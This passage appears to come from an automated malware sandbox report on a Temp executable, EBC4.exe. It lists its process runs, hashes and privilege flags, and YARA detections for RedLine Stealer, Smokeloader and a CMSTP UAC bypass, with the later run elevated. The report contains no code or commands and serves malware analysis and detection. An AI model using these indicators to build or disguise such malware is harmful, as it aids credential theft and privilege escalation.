              Imagebase:0x2a0000
              File size:61952 bytes
              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:7
              Start time:20:13:25
              Start date:24/11/2022
              Path:C:\Users\user\AppData\Local\Temp\EBC4.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Local\Temp\EBC4.exe
              Imagebase:0x400000
              File size:520192 bytes
              MD5 hash:F06F222962C48BB7D822AC0FCD14CFD2
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.490026544.00000000007D8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.489025318.0000000000413000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000002.491094489.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              Antivirus matches:
              • Detection: 100%, Joe Sandbox ML
              Reputation:low

              Target ID:12
              Start time:20:13:30
              Start date:24/11/2022
              Path:C:\Users\user\AppData\Local\Temp\EBC4.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Local\Temp\EBC4.exe"
              Imagebase:0x400000
              File size:520192 bytes
              MD5 hash:F06F222962C48BB7D822AC0FCD14CFD2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.507752658.0000000000413000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000C.00000002.508127719.00000000008EF000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000C.00000002.507936958.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              Reputation:low

              No disassembly